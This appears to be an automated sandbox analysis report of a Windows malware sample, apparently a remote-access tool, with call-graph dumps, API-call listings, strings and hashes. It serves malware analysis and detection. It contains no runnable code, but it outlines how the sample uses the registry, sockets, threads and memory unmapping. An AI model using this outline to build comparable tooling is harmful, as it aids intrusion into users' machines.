46973 293257e 46972->46973 46973->46603 46974->46611 46976 292b02f 46975->46976 46979 292b04b 46976->46979 46978 292b045 46978->46622 46980 292b055 46979->46980 46982 292b060 46980->46982 46983 292b138 28 API calls 46980->46983 46982->46978 46983->46982 46984->46626 46985->46628 46987 292230d 46986->46987 46988 2922325 28 API calls 46987->46988 46989 2921f80 46988->46989 46989->46356 47006 295a545 46990->47006 46992 295998b 47012 29592de 35 API calls 3 library calls 46992->47012 46994 2959965 47011 2965354 20 API calls __dosmaperr 46994->47011 46995 2959950 46995->46992 46995->46994 46997 295996a pre_c_initialization 46995->46997 46997->46654 46999 2959997 47001 29599c6 46999->47001 47013 295a58a 39 API calls __Tolower 46999->47013 47000 2959a32 47015 295a4f1 20 API calls 2 library calls 47000->47015 47001->47000 47014 295a4f1 20 API calls 2 library calls 47001->47014 47004 2959af9 _strftime 47004->46997 47016 2965354 20 API calls __dosmaperr 47004->47016 47007 295a55d 47006->47007 47008 295a54a 47006->47008 47007->46995 47017 2965354 20 API calls __dosmaperr 47008->47017 47010 295a54f pre_c_initialization 47010->46995 47011->46997 47012->46999 47013->46999 47014->47000 47015->47004 47016->46997 47017->47010 47022 2921e9b 47018->47022 47020 29227d9 47020->46667 47021->46671 47023 2921ea7 47022->47023 47024 292245c 28 API calls 47023->47024 47025 2921eb9 47024->47025 47025->47020 47027 2929855 47026->47027 47028 29324b7 3 API calls 47027->47028 47029 292985c 47028->47029 47030 2929870 47029->47030 47031 292988a 47029->47031 47033 29295cf 47030->47033 47034 2929875 47030->47034 47047 29282dc 28 API calls 47031->47047 47033->46407 47045 29282dc 28 API calls 47034->47045 47035 2929898 47048 29298a5 85 API calls 47035->47048 47038 2929883 47046 2929959 29 API calls 47038->47046 47040 2929888 47040->47033 47041->46697 47052 2922d8b 47042->47052 47044 29228dd 47044->46700 47045->47038 47046->47040 47049 292999f 129 API calls 47046->47049 47047->47035 47048->47033 47050 29299b5 52 API calls 47048->47050 47051 29299a9 124 API calls 47048->47051 47053 2922d97 47052->47053 47056 29230f7 47053->47056 47055 2922dab 47055->47044 47057 2923101 47056->47057 47059 2923115 47057->47059 47060 29236c2 28 API calls 47057->47060 47059->47055 47060->47059 47062 2923b48 47061->47062 47068 2923b7a 47062->47068 47065 2923cbb 47077 2923dc2 47065->47077 47067 2923cc9 47067->46708 47069 2923b86 47068->47069 47072 2923b9e 47069->47072 47071 2923b5a 47071->47065 47073 2923ba8 47072->47073 47075 2923bb3 47073->47075 47076 2923cfd 28 API calls 47073->47076 47075->47071 47076->47075 47078 2923dce 47077->47078 47081 2922ffd 47078->47081 47080 2923de3 47080->47067 47082 292300e 47081->47082 47087 29232a4 47082->47087 47086 292302e 47086->47080 47088 29232b0 47087->47088 47089 292301a 47087->47089 47093 29232b6 22 API calls 47088->47093 47089->47086 47092 29235e8 28 API calls 47089->47092 47092->47086 47100 29595ba 47094->47100 47098 2932814 47097->47098 47099 29327ed RegSetValueExA RegCloseKey 47097->47099 47098->46734 47099->47098 47103 295953b 47100->47103 47102 2921608 47102->46732 47104 295955e 47103->47104 47105 295954a 47103->47105 47108 295954f pre_c_initialization __alldvrm 47104->47108 47110 2967601 11 API calls 2 library calls 47104->47110 47109 2965354 20 API calls __dosmaperr 47105->47109 47108->47102 47109->47108 47110->47108 47114 293aab9 _Yarn ___scrt_fastfail 47111->47114 47112 2921f66 28 API calls 47113 293ab2e 47112->47113 47113->46738 47114->47112 47115->46754 47117 2933fb3 getaddrinfo WSASetLastError 47116->47117 47118 2933fa9 47116->47118 47117->46782 47234 2933e37 29 API calls ___std_exception_copy 47118->47234 47120 2933fae 47120->47117 47122 2924206 socket 47121->47122 47123 29241fd 47121->47123 47125 2924220 47122->47125 47126 2924224 CreateEventW 47122->47126 47235 2924262 WSAStartup 47123->47235 47125->46782 47126->46782 47127 2924202 47127->47122 47127->47125 47129 29249b1 47128->47129 47130 292492a 47128->47130 47129->46782 47131 2924933 47130->47131 47132 2924987 CreateEventA CreateThread 47130->47132 47133 2924942 GetLocalTime 47130->47133 47131->47132 47132->47129 47238 2924b1d 47132->47238 47236 293ad46 28 API calls 47133->47236 47135 292495b 47237 2924c9e 28 API calls 47135->47237 47137 2924968 47138 2921f66 28 API calls 47137->47138 47139 2924977 47138->47139 47140 293a686 79 API calls 47139->47140 47141 292497c 47140->47141 47142 2921eea 11 API calls 47141->47142 47142->47132 47144 29242b3 47143->47144 47145 29243e1 47143->47145 47146 2924343 47144->47146 47150 2924cbf 28 API calls 47144->47150 47166 29242e8 47144->47166 47145->47146 47147 29243e7 WSAGetLastError 47145->47147 47146->46782 47147->47146 47148 29243f7 47147->47148 47151 29242f7 47148->47151 47152 29243fc 47148->47152 47154 29242d4 47150->47154 47158 2921f66 28 API calls 47151->47158 47253 293bc76 30 API calls 47152->47253 47153 29242f0 47153->47151 47157 2924306 47153->47157 47159 2921f66 28 API calls 47154->47159 47156 292440b 47254 2924c9e 28 API calls 47156->47254 47168 2924315 47157->47168 47169 292434c 47157->47169 47161 2924448 47158->47161 47162 29242e3 47159->47162 47165 2921f66 28 API calls 47161->47165 47163 293a686 79 API calls 47162->47163 47163->47166 47164 2924418 47167 2921f66 28 API calls 47164->47167 47170 2924457 47165->47170 47242 2940151 27 API calls 47166->47242 47171 2924427 47167->47171 47173 2921f66 28 API calls 47168->47173 47250 2940f34 53 API calls 47169->47250 47174 293a686 79 API calls 47170->47174 47175 293a686 79 API calls 47171->47175 47177 2924324 47173->47177 47174->47146 47178 292442c 47175->47178 47176 2924354 47179 2924389 47176->47179 47180 2924359 47176->47180 47181 2921f66 28 API calls 47177->47181 47183 2921eea 11 API calls 47178->47183 47252 29402ea 28 API calls 47179->47252 47184 2921f66 28 API calls 47180->47184 47185 2924333 47181->47185 47183->47146 47187 2924368 47184->47187 47188 293a686 79 API calls 47185->47188 47186 2924391 47189 29243be CreateEventW CreateEventW 47186->47189 47192 2921f66 28 API calls 47186->47192 47190 2921f66 28 API calls 47187->47190 47191 2924338 47188->47191 47189->47146 47193 2924377 47190->47193 47243 2940191 47191->47243 47195 29243a7 47192->47195 47196 293a686 79 API calls 47193->47196 47197 2921f66 28 API calls 47195->47197 47198 292437c 47196->47198 47199 29243b6 47197->47199 47251 2940592 51 API calls 47198->47251 47201 293a686 79 API calls 47199->47201 47202 29243bb 47201->47202 47202->47189 47204 2924805 SetEvent CloseHandle 47203->47204 47205 292481c closesocket 47203->47205 47206 292489c 47204->47206 47207 2924829 47205->47207 47206->46782 47208 2924838 47207->47208 47209 292483f 47207->47209 47257 2924ab1 83 API calls 47208->47257 47211 2924892 SetEvent CloseHandle 47209->47211 47212 2924851 WaitForSingleObject 47209->47212 47211->47206 47213 2940191 3 API calls 47212->47213 47214 2924860 SetEvent WaitForSingleObject 47213->47214 47215 2940191 3 API calls 47214->47215 47216 2924878 SetEvent CloseHandle CloseHandle 47215->47216 47216->47211 47217->46782 47218->46782 47219->46782 47220->46782 47221->46782 47222->46782 47223->46782 47224->46802 47225->46802 47226->46802 47227->46802 47228->46802 47229->46802 47230->46802 47231->46802 47232->46802 47233->46802 47234->47120 47235->47127 47236->47135 47237->47137 47241 2924b29 101 API calls 47238->47241 47240 2924b26 47241->47240 47242->47153 47244 293dc15 47243->47244 47245 2940199 47243->47245 47246 293dc23 47244->47246 47255 293cd69 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47244->47255 47245->47146 47256 293d950 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47246->47256 47249 293dc2a 47250->47176 47251->47191 47252->47186 47253->47156 47254->47164 47255->47246 47256->47249 47257->47209 47259->46846 47260->46873 47261->46872 47262->46861 47263->46865 47264->46871 47267 292e56a 47265->47267 47266 29324b7 3 API calls 47266->47267 47267->47266 47269 292e60e 47267->47269 47271 292e5fe Sleep 47267->47271 47278 292e59c 47267->47278 47301 29282dc 28 API calls 47269->47301 47271->47267 47272 293ae08 28 API calls 47272->47278 47273 292e619 47275 293ae08 28 API calls 47273->47275 47276 292e625 47275->47276 47302 2932774 14 API calls 47276->47302 47278->47271 47278->47272 47280 2921e13 11 API calls 47278->47280 47283 2921f66 28 API calls 47278->47283 47287 29326d2 14 API calls 47278->47287 47298 292bf04 73 API calls ___scrt_fastfail 47278->47298 47299 29282dc 28 API calls 47278->47299 47300 2932774 14 API calls 47278->47300 47280->47278 47281 292e638 47282 2921e13 11 API calls 47281->47282 47284 292e644 47282->47284 47283->47278 47285 2921f66 28 API calls 47284->47285 47286 292e655 47285->47286 47288 29326d2 14 API calls 47286->47288 47287->47278 47289 292e668 47288->47289 47303 2931699 TerminateProcess WaitForSingleObject 47289->47303 47291 292e670 ExitProcess 47304 2931637 61 API calls 47293->47304 47299->47278 47300->47278 47301->47273 47302->47281 47303->47291 47305 295a998 47307 295a9a4 _swprintf CallCatchBlock 47305->47307 47306 295a9b2 47321 2965354 20 API calls __dosmaperr 47306->47321 47307->47306 47309 295a9dc 47307->47309 47316 2964acc EnterCriticalSection 47309->47316 47311 295a9b7 pre_c_initialization __wsopen_s 47312 295a9e7 47317 295aa88 47312->47317 47316->47312 47319 295aa96 47317->47319 47318 295a9f2 47322 295aa0f LeaveCriticalSection std::_Lockit::~_Lockit 47318->47322 47319->47318 47323 2968416 36 API calls 2 library calls 47319->47323 47321->47311 47322->47311 47323->47319 47324 2922bcc 47325 2922bd7 47324->47325 47326 2922bdf 47324->47326 47342 2923315 28 API calls __Getctype 47325->47342 47328 2922beb 47326->47328 47332 29215d3 47326->47332 47329 2922bdd 47334 295360d 47332->47334 47333 295a88c ___crtLCMapStringA 21 API calls 47333->47334 47334->47333 47335 2922be9 47334->47335 47338 295362e std::_Facet_Register 47334->47338 47343 2962200 7 API calls 2 library calls 47334->47343 47337 2953dec std::_Facet_Register 47345 2957bd7 RaiseException 47337->47345 47338->47337 47344 2957bd7 RaiseException 47338->47344 47341 2953e09 47342->47329 47343->47334 47344->47337 47345->47341

                                                                                                                        Executed Functions

                                                                                                                        Function 0292E54F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029324B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 029324D7
                                                                                                                          • Part of subcall function 029324B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,029942F8), ref: 029324F5
                                                                                                                          • Part of subcall function 029324B7: RegCloseKey.KERNELBASE(?), ref: 02932500
                                                                                                                        • Sleep.KERNELBASE(00000BB8), ref: 0292E603
                                                                                                                        • ExitProcess.KERNEL32 ref: 0292E672
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                        • String ID: 5.3.0 Pro$override$pth_unenc
                                                                                                                        • API String ID: 2281282204-531312966
                                                                                                                        • Opcode ID: 074833c94bbcb3a9120b045a3a33594ab685bad092a2aee2fa5c80f3f3cbf936
                                                                                                                        • Instruction ID: f98233a3284a8fe8daf1276ebb48f191859e7f919047282c37e2c7edba63761c
                                                                                                                        • Opcode Fuzzy Hash: 074833c94bbcb3a9120b045a3a33594ab685bad092a2aee2fa5c80f3f3cbf936
                                                                                                                        • Instruction Fuzzy Hash: DA212B21F1032027EA097A788C5AA7F36DF6BD1710F84041CE45A5B2DEEE619E188BD3
                                                                                                                        Function 0295293A Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1216 295293a-2952954 CryptAcquireContextA 1217 2952956 1216->1217 1218 295295b-295296a CryptGenRandom 1216->1218 1219 2952958-2952959 1217->1219 1220 2952970-295297a CryptReleaseContext 1218->1220 1221 295296c-295296e 1218->1221 1222 295297c-295297e 1219->1222 1220->1222 1221->1219
                                                                                                                        APIs
                                                                                                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,029526C2,00000024,?,?,?), ref: 0295294C
                                                                                                                        • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0294CBBE,?), ref: 02952962
                                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0294CBBE,?), ref: 02952974
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1815803762-0
                                                                                                                        • Opcode ID: 232473f7a88c193ccfb36d9f152648ce1c9c5913579cee66bc9bf13531c05a53
                                                                                                                        • Instruction ID: 4c13f0e8cc3278142332307e9b577cc04f632da973c0736c4fce27bafa942165
                                                                                                                        • Opcode Fuzzy Hash: 232473f7a88c193ccfb36d9f152648ce1c9c5913579cee66bc9bf13531c05a53
                                                                                                                        • Instruction Fuzzy Hash: CFE0923174C221BBEB314F21EC28FA76B58EF86B70F240D28FA11E41D4C2614455C758
                                                                                                                        Function 0293A7A2 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetComputerNameExW.KERNELBASE(00000001,?,0000002B,02994358), ref: 0293A7BF
                                                                                                                        • GetUserNameW.ADVAPI32(?,0292DFC3), ref: 0293A7D7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Name$ComputerUser
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4229901323-0
                                                                                                                        • Opcode ID: d6655580485b093fba16e02f04e1a806cbda8bfecbf81f253d7c00cd26cddd34
                                                                                                                        • Instruction ID: 24e1d5e4c9b00df479361349c39b90e9da7286215a0f685582939c022902dd96
                                                                                                                        • Opcode Fuzzy Hash: d6655580485b093fba16e02f04e1a806cbda8bfecbf81f253d7c00cd26cddd34
                                                                                                                        • Instruction Fuzzy Hash: 5901627290011CABDF04EB90DC54EEEB77DEF84310F100166A402B3194EFB4AA8D8F98
                                                                                                                        Function 029460F7 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: recv
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1507349165-0
                                                                                                                        • Opcode ID: 77b03e3c221bb01114aa2ce06bb2f174b0adb35e0095cfcd144affa2384fd464
                                                                                                                        • Instruction ID: d0d167a0765d03ab52a327dfac46ca9ecbb325b9c565e1c5c00b16622db11333
                                                                                                                        • Opcode Fuzzy Hash: 77b03e3c221bb01114aa2ce06bb2f174b0adb35e0095cfcd144affa2384fd464
                                                                                                                        • Instruction Fuzzy Hash: 0DB09B75508201FF871517A0CC0487ABE7797CC240F008D1DB54640130C53284549721
                                                                                                                        Function 0293BCE3 Relevance: 115.6, APIs: 40, Strings: 26, Instructions: 140libraryloaderCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0292D783), ref: 0293BCF8
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0293BD01
                                                                                                                        • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0292D783), ref: 0293BD18
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0293BD1B
                                                                                                                        • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0292D783), ref: 0293BD2D
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0293BD30
                                                                                                                        • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0292D783), ref: 0293BD41
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0293BD44
                                                                                                                        • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0292D783), ref: 0293BD55
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0293BD58
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0292D783), ref: 0293BD65
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0293BD68
                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0292D783), ref: 0293BD75
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0293BD78
                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0292D783), ref: 0293BD85
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0293BD88
                                                                                                                        • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0292D783), ref: 0293BD99
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0293BD9C
                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0292D783), ref: 0293BDA9
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0293BDAC
                                                                                                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0292D783), ref: 0293BDBD
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0293BDC0
                                                                                                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0292D783), ref: 0293BDD1
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0293BDD4
                                                                                                                        • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0292D783), ref: 0293BDE5
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0293BDE8
                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0292D783), ref: 0293BDF5
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0293BDF8
                                                                                                                        • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0292D783), ref: 0293BE06
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0293BE09
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0292D783), ref: 0293BE16
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0293BE19
                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0292D783), ref: 0293BE2B
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0293BE2E
                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0292D783), ref: 0293BE3B
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0293BE3E
                                                                                                                        • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0292D783), ref: 0293BE50
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0293BE53
                                                                                                                        • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0292D783), ref: 0293BE60
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0293BE63
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                                        • API String ID: 384173800-625181639
                                                                                                                        • Opcode ID: 0553557848a05eab65fa330b85122649301bf2374f57d63c5972b185a09ba71e
                                                                                                                        • Instruction ID: 2b61c1ca5cf560eab7a0eac2b1c240a6894dcc214886e71f9361ee3f13d59f29
                                                                                                                        • Opcode Fuzzy Hash: 0553557848a05eab65fa330b85122649301bf2374f57d63c5972b185a09ba71e
                                                                                                                        • Instruction Fuzzy Hash: A831F2A1D8431C7DFA107FBA9C6DC3FBF9CD98496830D0C6AB505D3142DA7898148EA8
                                                                                                                        Function 0292D767 Relevance: 46.3, APIs: 13, Strings: 13, Instructions: 799COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 5 292d767-292d7e9 call 293bce3 GetModuleFileNameW call 292e168 call 2921fbd * 2 call 293afc3 call 292e8bd call 2921d8c call 295e820 22 292d835-292d8fd call 2921d64 call 2921e8f call 2921d64 call 2924cbf call 2925ce6 call 2921eef call 2921eea * 2 call 2921d64 call 2921ebd call 292541d call 2921d64 call 2924bb1 call 2921d64 call 2924bb1 5->22 23 292d7eb-292d830 call 292e986 call 2921d64 call 2921e8f call 292fcba call 292e937 call 292e155 5->23 69 292d950-292d96b call 2921d64 call 292b125 22->69 70 292d8ff-292d94a call 29285b4 call 2921eef call 2921eea call 2921e8f call 29324b7 22->70 49 292dc96-292dca7 call 2921eea 23->49 79 292d9a5-292d9ac call 292bed7 69->79 80 292d96d-292d98c call 2921e8f call 29324b7 69->80 70->69 100 292e134-292e154 call 2921e8f call 2932902 call 29312b5 70->100 88 292d9b5-292d9bc 79->88 89 292d9ae-292d9b0 79->89 80->79 99 292d98e-292d9a4 call 2921e8f call 2932902 80->99 93 292d9c0-292d9cc call 293a463 88->93 94 292d9be 88->94 92 292dc95 89->92 92->49 103 292d9d5-292d9d9 93->103 104 292d9ce-292d9d0 93->104 94->93 99->79 108 292d9db call 292697b 103->108 109 292da18-292da2b call 2921d64 call 2921e8f 103->109 104->103 116 292d9e0-292d9e2 108->116 128 292da32-292daba call 2921d64 call 293ae08 call 2921e18 call 2921e13 call 2921d64 call 2921e8f call 2921d64 call 2921e8f call 2921d64 call 2921e8f call 2921d64 call 2921e8f 109->128 129 292da2d call 29269ba 109->129 119 292d9e4-292d9e9 call 292699d call 29264d0 116->119 120 292d9ee-292da01 call 2921d64 call 2921e8f 116->120 119->120 120->109 138 292da03-292da09 120->138 163 292db22-292db26 128->163 164 292dabc-292dad5 call 2921d64 call 2921e8f call 295a611 128->164 129->128 138->109 140 292da0b-292da11 138->140 140->109 142 292da13 call 29264d0 140->142 142->109 165 292dcaa-292dd01 call 2956050 call 29222f8 call 2921e8f * 2 call 293265d call 29282d7 163->165 166 292db2c-292db33 163->166 164->163 189 292dad7-292db1d call 2921d64 call 2921e8f call 2921d64 call 2921e8f call 292c89e call 2921e18 call 2921e13 164->189 220 292dd06-292dd5c call 2921d64 call 2921e8f call 2921f66 call 2921e8f call 29326d2 call 2921d64 call 2921e8f call 295a5e7 165->220 169 292dbb1-292dbbb call 29282d7 166->169 170 292db35-292dbaf call 2921d64 call 2921e8f call 2921d64 call 2921e8f call 2921d64 call 2921e8f call 2921d64 call 2921e8f call 2921d64 call 2921e8f call 292bc67 166->170 179 292dbc0-292dbe4 call 29222f8 call 29538c8 169->179 170->179 197 292dbf3 179->197 198 292dbe6-292dbf1 call 2956050 179->198 189->163 203 292dbf5-292dc40 call 2921e07 call 295e349 call 29222f8 call 2921e8f call 29222f8 call 2921e8f call 29328a2 197->203 198->203 258 292dc45-292dc6a call 29538d1 call 2921d64 call 292b125 203->258 272 292dd79-292dd7b 220->272 273 292dd5e 220->273 258->220 274 292dc70-292dc91 call 2921d64 call 293ae08 call 292e219 258->274 276 292dd81 272->276 277 292dd7d-292dd7f 272->277 275 292dd60-292dd77 call 293beb0 CreateThread 273->275 274->220 292 292dc93 274->292 280 292dd87-292de66 call 2921f66 * 2 call 293a686 call 2921d64 call 2921e8f call 2921d64 call 2921e8f call 2921d64 call 2921e8f call 295a5e7 call 2921d64 call 2921e8f call 2921d64 call 2921e8f call 2921d64 call 2921e8f call 2921d64 call 2921e8f StrToIntA call 2929517 call 2921d64 call 2921e8f 275->280 276->280 277->275 330 292dea1 280->330 331 292de68-292de9f call 295360d call 2921d64 call 2921e8f CreateThread 280->331 292->92 332 292dea3-292debb call 2921d64 call 2921e8f 330->332 331->332 342 292def9-292df0c call 2921d64 call 2921e8f 332->342 343 292debd-292def4 call 295360d call 2921d64 call 2921e8f CreateThread 332->343 353 292df0e-292df67 call 2921d64 call 2921e8f call 2921d64 call 2921e8f call 292c854 call 2921e18 call 2921e13 CreateThread 342->353 354 292df6c-292df7f call 2921d64 call 2921e8f 342->354 343->342 353->354 365 292df81-292dfb5 call 2921d64 call 2921e8f call 2921d64 call 2921e8f call 295a5e7 call 292b95c 354->365 366 292dfba-292dfde call 293a7a2 call 2921e18 call 2921e13 354->366 365->366 386 292dfe3-292dff6 CreateThread 366->386 387 292dfe0-292dfe1 SetProcessDEPPolicy 366->387 390 292e004-292e00b 386->390 391 292dff8-292e002 CreateThread 386->391 387->386 395 292e019-292e020 390->395 396 292e00d-292e017 CreateThread 390->396 391->390 399 292e022-292e025 395->399 400 292e033-292e038 395->400 396->395 401 292e073-292e08e call 2921e8f call 293246e 399->401 402 292e027-292e031 399->402 404 292e03d-292e06e call 2921f66 call 2924c9e call 2921f66 call 293a686 call 2921eea 400->404 413 292e094-292e0d4 call 293ae08 call 2921e07 call 2932584 call 2921e13 call 2921e07 401->413 414 292e12a-292e12f call 292cbac call 2933fd4 401->414 402->404 404->401 433 292e0ed-292e0f2 DeleteFileW 413->433 414->100 434 292e0d6-292e0d9 433->434 435 292e0f4-292e125 call 293ae08 call 2921e07 call 293297a call 2921e13 * 2 433->435 434->435 437 292e0db-292e0e8 Sleep call 2921e07 434->437 435->414 437->433
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0293BCE3: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0292D783), ref: 0293BCF8
                                                                                                                          • Part of subcall function 0293BCE3: GetProcAddress.KERNEL32(00000000), ref: 0293BD01
                                                                                                                          • Part of subcall function 0293BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0292D783), ref: 0293BD18
                                                                                                                          • Part of subcall function 0293BCE3: GetProcAddress.KERNEL32(00000000), ref: 0293BD1B
                                                                                                                          • Part of subcall function 0293BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0292D783), ref: 0293BD2D
                                                                                                                          • Part of subcall function 0293BCE3: GetProcAddress.KERNEL32(00000000), ref: 0293BD30
                                                                                                                          • Part of subcall function 0293BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0292D783), ref: 0293BD41
                                                                                                                          • Part of subcall function 0293BCE3: GetProcAddress.KERNEL32(00000000), ref: 0293BD44
                                                                                                                          • Part of subcall function 0293BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0292D783), ref: 0293BD55
                                                                                                                          • Part of subcall function 0293BCE3: GetProcAddress.KERNEL32(00000000), ref: 0293BD58
                                                                                                                          • Part of subcall function 0293BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0292D783), ref: 0293BD65
                                                                                                                          • Part of subcall function 0293BCE3: GetProcAddress.KERNEL32(00000000), ref: 0293BD68
